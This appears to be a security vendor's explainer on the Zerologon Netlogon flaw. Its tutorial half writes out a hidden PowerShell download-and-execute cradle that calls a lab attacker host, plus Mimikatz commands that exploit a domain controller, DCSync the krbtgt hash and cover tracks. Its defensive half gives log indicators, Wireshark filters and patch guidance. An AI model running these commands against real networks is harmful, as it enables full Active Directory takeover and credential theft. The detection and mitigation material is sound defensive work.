Zerologon Exploit Attack

Active Directory
Credential Access
Privilege Escalation

On September 11, 2020, researchers at Secura announced a new vulnerability they named Zerologon. Zerologon enables an unauthenticated attacker to remotely escalate their privileges to Domain Admin, with network access to a domain controller as the only requirement. Every organization running Active Directory was vulnerable to this exploit.

Zerologon exploits an insecure implementation of encryption in the Netlogon Remote Protocol. The researchers discovered that the ComputeNetLogonCredential function utilized a null (all zeros) initialization vector (IV) for the AES algorithm operating in 8-bit cipher feedback mode. When operating in this mode, reusing the same IV leaks information about the plaintext password and is considered insecure.

In normal operation, the weak IV implementation isn't noticeable, but the researchers found that about 1 in 256 authentications with an all-zero plaintext password and an all-zero IV produced an all-zero ciphertext. This means that once an attacker has network access to a domain controller, they can brute-force their way onto the domain controller in about 256 attempts — which takes only 2–3 seconds. Any account lockout policy that might be in place is irrelevant because it applies only to user accounts.
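
The following Python is an added illustration (not code from the page or from Secura) of the CFB8 property described above. Since CFB8 only ever uses the forward direction of the block cipher, the AES block function is replaced by a constructed SHA-256 stand-in, which reproduces the mode's behaviour; the final check models the August 2020 fix as the page describes it.

```python
import hashlib
import os

BLOCK = 16  # AES block size in bytes; Netlogon challenges and credentials are 8 bytes

def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Constructed stand-in for AES-128 block encryption (not real AES).
    CFB8 uses only the forward direction of the block cipher, so any keyed
    pseudo-random function reproduces the mode's behaviour exactly."""
    return hashlib.sha256(key + block).digest()[:BLOCK]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """8-bit cipher feedback: each plaintext byte is XORed with the first
    byte of E_k(register), and the resulting ciphertext byte is shifted
    into the register. The register starts as the IV."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(register))[0]
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)

def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """ComputeNetlogonCredential as the page describes it: AES-CFB8 with a
    fixed all-zero IV applied to the 8-byte challenge."""
    return cfb8_encrypt(session_key, bytes(BLOCK), challenge)

def zero_in_zero_out(session_key: bytes) -> bool:
    """True when an all-zero challenge yields an all-zero credential.
    With a zero IV the register is all zeros; if the first keystream byte is
    0x00 the ciphertext byte is 0x00, the register stays all zeros, and every
    following byte is 0x00 too. So this holds iff E_k(0^16)[0] == 0x00."""
    return compute_netlogon_credential(session_key, bytes(8)) == bytes(8)

def fraction_of_keys_hit(trials: int = 30000) -> float:
    """Estimate how often a random session key gives zero-in/zero-out: about
    1/256, which is why roughly 256 attempts suffice whatever the real key."""
    hits = sum(zero_in_zero_out(os.urandom(16)) for _ in range(trials))
    return hits / trials

def patched_dc_accepts(client_value: bytes) -> bool:
    """Check modelled on the page's description of the fix: an 8-byte value
    whose first 5 bytes are all identical is refused, which removes the
    all-zero input the attack depends on."""
    return len(set(client_value[:5])) > 1
```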

Threat Summary

Target: Active Directory
Tools: Covenant, Mimikatz
ATT&CK® Tactic: Credential Access, Privilege Escalation
Difficulty:
  Detection: Medium
  Mitigation: Low
  Response: Hard

Attack Tutorial: How the Zerologon Attack Works

STEP 1

Gain a foothold in the network

To exploit the Zerologon vulnerability, an adversary must first gain a foothold in the victim's network so they can communicate directly with a vulnerable domain controller. There are many ways to gain a foothold; in the example below, we assume the adversary has tricked an unsuspecting user into opening a malicious document that deploys a backdoor and connects to the adversary's Covenant command-and-control infrastructure.

Code:

# Non-Encoded Command
powershell -Sta -Nop -Window Hidden -Command "iex (New-Object Net.WebClient).DownloadString('http://sbl-kali2/ps-listener')"

# Encoded Command
powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBiAGwALQBrAGEAbABpADIALwBwAHMALQBsAGkAcwB0AGUAbgBlAHIAJwApAA

STEP 2

Locate a vulnerable domain controller

Once the adversary has obtained a foothold on the network, they need to conduct reconnaissance to determine whether any domain controllers are present and vulnerable to the exploit. Because they now possess code execution rights on a user's computer, they are able to use PowerShell to enumerate domain controllers and versions in the current domain.

Code:

PowerShell /powershellcommand:"[DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select Name, OSVersion"

STEP 3

Authenticate to a vulnerable DC

Once the adversary determines which vulnerable domain controllers they can communicate with, they can easily exploit the Zerologon vulnerability, as all it requires is the ability to communicate with a domain controller over Netlogon RPC. It's important to note that this attack doesn't require authentication and can be executed from a non-Windows system.

Code:

Mimikatz.exe "Lsadump::zerologon /target:sbl-basalt2 /account:sbl-basalt2$ /exploit"

Output:

mimikatz # lsadump::zerologon /target:sbl-basalt2 /account:sbl-basalt2$ /exploit /null
Remote   : sbl-basalt2
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: yes

Target : sbl-basalt2
Account: sbl-basalt2$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
======================================================================================================================================================================

NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable

STEP 4

Complete the attack

Running the command above will have reset the password for the domain controller's computer account to a null value. It is important to note that only the computer account's password in Active Directory has been reset; the domain controller will still be attempting to use its old password to replicate changes, which will fail.

The adversary can now use this computer account (and the privileges assigned to it) to further compromise Active Directory. For example, they can use these credentials to conduct a DCSync attack to replicate the KRBTGT password hash and mint Golden Tickets. Afterward, the adversary can cover their tracks by running the lsadump::postzerologon command to restore the domain controller to operational status.

Code:

lsadump::dcsync /domain:basalt.igneous.stealthbitslab.com /dc:sbl-basalt2 /user:ba\krbtgt /authuser:sbl-basalt2$ /authdomain:ba /authpassword:"" /authntlm

lsadump::postzerologon /target:10.154.202.2 /account:sbl-basalt2$ /null

Output:

mimikatz # lsadump::dcsync /domain:basalt.igneous.stealthbitslab.com /dc:sbl-basalt2 /user:ba\krbtgt /authuser:sbl-basalt2$ /authdomain:ba /authpassword:"" /authntlm
[DC] 'basalt.igneous.stealthbitslab.com' will be the domain
[DC] 'sbl-basalt2' will be the DC server
[DC] 'ba\krbtgt' will be the user account
[AUTH] Username: sbl-basalt2$
[AUTH] Domain : ba
[AUTH] Password:
[AUTH] Explicit NTLM Mode
--- Output Truncated ---
Credentials:
Hash NTLM: 75557a32b7c51e11361ab752eb9720da
  ntlm- 0: 75557a32b7c51e11361ab752eb9720da
  lm  - 0: cf591b998a49fa934e3fb0dde45c75ff
--- Output Truncated ---
  Credentials
    aes256_hmac       (4096) : 13d99f13f9f984b8af7779f97e9b096897b7d79653369c46dddc9fb6b17c806b
    aes128_hmac       (4096) : 97605fe38f43efdf348dc16a75acb265
    des_cbc_md5       (4096) : c1f7e989dfbcf4fb
--- Output Truncated ---

mimikatz # lsadump::postzerologon /target:10.154.202.2 /account:sbl-basalt2$ /null

Procedure to update AD domain password and its local stored password remotely
mimic `netdom resetpwd`, experimental & best situation after reboot

Target : 10.154.202.2
Account: sbl-basalt2$

* SAM information

Domain name : BA
Domain SID   : S-1-5-21-792045605-1560570832-3988794325
User RID     : 1122

> Password updated (to FlipFl0p2020)

* Computer stored password

> Password updated (to FlipFl0p2020)

Detect, Mitigate and Respond

Detect

Difficulty: Medium

It's possible to detect the exploitation of the Zerologon vulnerability using:
  • Netlogon service debug logs
  • Packet capturing
  • Offensive tooling to check for current or past empty passwords

Detection using Netlogon Debug Logs

Netlogon debug logging is very useful for troubleshooting many types of issues in an Active Directory environment — including finding signs of attempted or successful Zerologon exploitation. However, Netlogon debug logs are not enabled by default. Running the command nltest /DBFlag:20000300 will enable logging of critical error and session setup events.

Attempts to exploit the Zerologon vulnerability are evidenced by multiple NetrServerAuthenticate messages from the same host within the same second that result in a Bad password error. This activity can also be used to detect attempts to exploit the vulnerability against domain controllers that have already been patched.
11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$

If the target domain controller is vulnerable, an eventual success message will also be found:
11/10 11:26:48 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: mimikatz on account sbl-basalt2$ (Negot: 212fffff)

Executing mimikatz (Step 3 above) resets the domain controller's computer account password to a null value. This is evidenced by a NetpServerPasswordSet call that sets the password to the null value. The null value can be readily detected by searching the log for the string d98c1dd4 04b2008f 980980e9 7e42f8ec, which is the MD5 hash of the null password.
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Entered
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Changing password locally
11/10 11:43:49 [SESSION] [2272] Setting Password of 'sbl-basalt2$' to: d98c1dd4 04b2008f 980980e9 7e42f8ec   ..............B~
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ returns 0x0
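
As an added example (not part of the original page), the Python below applies the three Netlogon debug log indicators just described to a constructed sample log in the page's line format: a burst of Bad password results for one client within a second, a Success from that same client, and a NetpServerPasswordSet that writes the empty-password MD5.

```python
import re
from collections import Counter

# Netlogon debug log lines as quoted on the page:
#   "MM/DD HH:MM:SS [LEVEL] [THREAD] DOMAIN: message"
LINE_RE = re.compile(r"^(\d\d/\d\d \d\d:\d\d:\d\d) \[\w+\] \[\d+\] (.*)$")
BAD_PW_RE = re.compile(r"NetrServerAuthenticate: Bad password \d+ for (\S+) on account (\S+)")
SUCCESS_RE = re.compile(r"NetrServerAuthenticate returns Success: (\S+) on account (\S+)")
SET_PW_RE = re.compile(r"Setting Password of '(\S+)' to: ((?:[0-9a-f]{8} ){3}[0-9a-f]{8})")

# The empty-password MD5 exactly as the log prints it (value quoted on the page).
NULL_PASSWORD_MD5 = "d98c1dd4 04b2008f 980980e9 7e42f8ec"

def analyze_netlogon_log(lines, burst_threshold=3):
    """Return findings as (kind, client, account, timestamp) tuples:
    zerologon_attempt  - >= burst_threshold Bad password results for one
                         client/account within the same second
    zerologon_success  - a Success for a client that was bursting
    null_password_set  - NetpServerPasswordSet wrote the empty-password MD5"""
    bad = Counter()      # (second, client, account) -> Bad password count
    successes = []
    findings = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        ts, msg = m.groups()
        if b := BAD_PW_RE.search(msg):
            bad[(ts, b.group(1), b.group(2))] += 1
        elif s := SUCCESS_RE.search(msg):
            successes.append((ts, s.group(1), s.group(2)))
        elif (p := SET_PW_RE.search(msg)) and p.group(2) == NULL_PASSWORD_MD5:
            findings.append(("null_password_set", None, p.group(1), ts))
    bursts = sorted(k for k, n in bad.items() if n >= burst_threshold)
    findings += [("zerologon_attempt", c, a, ts) for ts, c, a in bursts]
    burst_clients = {(c, a) for _, c, a in bursts}   # ordinary successes are not findings
    findings += [("zerologon_success", c, a, ts)
                 for ts, c, a in successes if (c, a) in burst_clients]
    return findings

SAMPLE_LOG = [  # constructed from the page's line format; not a real capture
    "11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$",
    "11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$",
    "11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$",
    "11/10 11:26:48 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: mimikatz on account sbl-basalt2$ (Negot: 212fffff)",
    "11/10 11:30:02 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: WKSTN01 on account WKSTN01$ (Negot: 612fffff)",
    "11/10 11:43:49 [SESSION] [2272] Setting Password of 'sbl-basalt2$' to: d98c1dd4 04b2008f 980980e9 7e42f8ec   ..............B~",
]
```

Calling analyze_netlogon_log(SAMPLE_LOG) flags the mimikatz burst, its subsequent success and the null password set, while the routine WKSTN01 success is left alone.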

Detection using Network Packet Captures

Network monitoring can also be used to detect attempts to exploit the Zerologon vulnerability. Monitor Netlogon traffic for the NetrServerAuthenticate2 operation where the client credential is all zeros. For example, in Wireshark, the display filter netlogon.opnum == 15 && netlogon.clientcred == 00:00:00:00:00:00:00:00 will show this traffic.

If exploitation is successful, then a packet will exist where the client credential is all zeros but the authentication return code is Status_Success (0x00000000). The Wireshark display filter to find this traffic is netlogon.opnum == 15 && (netlogon.rc == 0x00000000 || netlogon.clientcred == 00:00:00:00:00:00:00:00).

Detection using Offensive Tooling

This strategy is particularly useful if you suspect that domain controllers may have been compromised in the recent past and an adversary has covered their tracks. Because this approach uses offensive tooling, it's important to get the right approvals before attempting it. You can use tools like mimikatz and the DCSync technique to replicate domain controller computer account password hashes from Active Directory. This will show all the stored hashes for the computer account up to the maximum specified by the Enforce Password History setting in the password policy; check for a current or previous hash of 31d6cfe0d16ae931b73c59d7e0c089c0, which is the NTLM hash for an empty password.

Mitigate

Difficulty: Low

It is essential to apply the patches released by Microsoft in August of 2020, which resolve the vulnerability by denying authentication if the first 5 bytes of the clientStoredCredential are not unique.

If any domain controllers still operate on an unsupported (and therefore unpatched) version of Windows (2008R2 and below), isolate them and make plans to upgrade or replace them. If technical requirements prevent upgrading to supported versions, separate domains should be used for these legacy systems.

Respond

Difficulty: Hard

If an adversary has successfully exploited Zerologon, then a full compromise of Active Directory should be presumed. Additional evidence of attempts to compromise the NTDS.dit file or use of the DCSync technique should be expected. You should activate the incident response process and alert the response team.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.